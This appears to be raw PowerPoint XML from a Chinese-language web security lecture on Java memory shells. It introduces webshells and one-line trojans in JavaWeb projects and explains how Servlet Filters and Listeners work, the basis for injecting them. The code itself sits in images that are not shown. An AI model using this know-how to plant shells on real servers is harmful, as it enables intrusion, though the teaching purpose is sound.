                  <a:schemeClr val="bg1"/>
                </a:solidFill>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KSO_Shape"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7613570" y="484085"/>
            <a:ext cx="383120" cy="383120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY0" fmla="*/ 96048 h 576064"/>
              <a:gd name="connsiteX1" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY1" fmla="*/ 480016 h 576064"/>
              <a:gd name="connsiteX2" fmla="*/ 502964 w 576064"/>
              <a:gd name="connsiteY2" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX3" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 576064"/>
              <a:gd name="connsiteX4" fmla="*/ 576064 w 576064"/>
              <a:gd name="connsiteY4" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX5" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY5" fmla="*/ 576064 h 576064"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 576064"/>
              <a:gd name="connsiteY6" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX7" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY7" fmla="*/ 0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064" h="576064">
                <a:moveTo>
                  <a:pt x="171957" y="96048"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171957" y="480016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502964" y="288032"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="288032" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447108" y="0"/>
                  <a:pt x="576064" y="128956"/>
                  <a:pt x="576064" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="576064" y="447108"/>
                  <a:pt x="447108" y="576064"/>
                  <a:pt x="288032" y="576064"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128956" y="576064"/>
                  <a:pt x="0" y="447108"/>
                  <a:pt x="0" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="128956"/>
                  <a:pt x="128956" y="0"/>
                  <a:pt x="2880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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10505200" y="447095"/>
            <a:ext cx="1409700" cy="479425"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39"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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="176950" y="455484"/>
            <a:ext cx="432854" cy="432854"/>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grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="3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ldLvl="0" animBg="1"/>
    </p:bld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1B8B2A2-61C4-4EB0-86FB-F394674D733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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="图表&#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5" y="1384300"/>
            <a:ext cx="9706610" cy="4091305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>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Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1381374"/>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Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>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Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1612216" y="301163"/>
            <a:ext cx="3203932" cy="181898"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="8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1" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>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Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="271703" y="851177"/>
            <a:ext cx="4531458"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Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>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文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634729" y="2602886"/>
            <a:ext cx="4288354" cy="1323439"/>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谢谢观看</a:t>
            </a:r>
            <a:endPar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28" name="直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349998" y="43848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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9879748" y="458427"/>
            <a:ext cx="1877060" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8147690" y="4618806"/>
            <a:ext cx="3262432" cy="400110"/>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9" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5295995" y="133020"/>
            <a:ext cx="2749035" cy="934920"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10"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2"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3"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36" name="图片 35" descr="模糊的照片上写着字&#10;&#10;中度可信度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103" y="5609657"/>
            <a:ext cx="4886325" cy="1247775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="灯片编号占位符 36"/>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transition/>
  <p:hf hdr="0" ftr="0" dt="0"/>
</p:sldLayout>
</file>

<file path=ppt/slideMasters/_rels/slideMaster1.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tags" Target="../tags/tag19.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0"/>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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId1"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vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId1"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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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en-US" altLang="zh-CN"/>
              <a:t>web security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:t>内存马专题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </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3328035" cy="478155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大马展示：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218690" y="1759585"/>
            <a:ext cx="6848475" cy="1266825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5611495" y="2808605"/>
            <a:ext cx="5319395" cy="3822700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154305" y="3295650"/>
            <a:ext cx="5413375" cy="2408555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4641850" y="1214120"/>
            <a:ext cx="4946015" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以在次明确所谓的大马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就是多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>集成</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4636770" cy="413385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目中的一句话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马展示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>核心代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="316230" y="1628140"/>
            <a:ext cx="7934325" cy="1314450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275590" y="3429000"/>
            <a:ext cx="8267700" cy="2257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en-US" altLang="zh-CN"/>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即过滤器，其作用是请求到达servlet之前对其进行过滤，对其进行预处理，在servlet对于请求处理完毕返回后对响应对象进行后处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术相似，只不过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关注的是方法调用的切面，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>响应的方面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。Filter本身并不申请请求对象(Request)和响应对象(Response)， 只提供过滤功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在设计的思想上和动态代理的思路是一样的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的都是对实际的业务功能进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>增强。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用场景：登录验证、日志、关键字过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="310515" y="3429000"/>
            <a:ext cx="5836920" cy="1570355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6436995" y="4399280"/>
            <a:ext cx="4244975" cy="1915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en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的执行流程以及生命</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>周期：</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从执行流程中可以看出生命周期主要有三个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、doFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、destroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、自定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类实现Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、通过配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者使用注解的方式进行对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>配置。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154305" y="1725295"/>
            <a:ext cx="11944350" cy="1914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en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Listener是Servlet的监听器，它可以监听客户端的请求，服务端的操作。 我们平常做开发的使用通常会给按钮增加监听器，点击这个按钮，触发一项监听事件，如Java swing开发中的ActionListener。监听器Listener的内容就是在application,session,request三个对象创建、销毁或者往其中添加修改删除属性时自动执行代码的功能组件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么三个域对象在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中对应的监听器类型是什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对Session的操作， HttpSessionListener</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>对Request的操作， ServletReuqestListener</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>对context的操作， ServletContextListener</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HttpSessionListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：（请求的创建和销毁）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作用: 监听 HTTP 会话的生命周期事件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口方法:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sessionCreated(HttpSessionEvent se): 当新的会话被创建时调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sessionDestroyed(HttpSessionEvent se): 当会话被销毁时调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用途:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用于管理用户会话的状态，比如跟踪用户登录状态、监控会话过期、管理会话属性等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
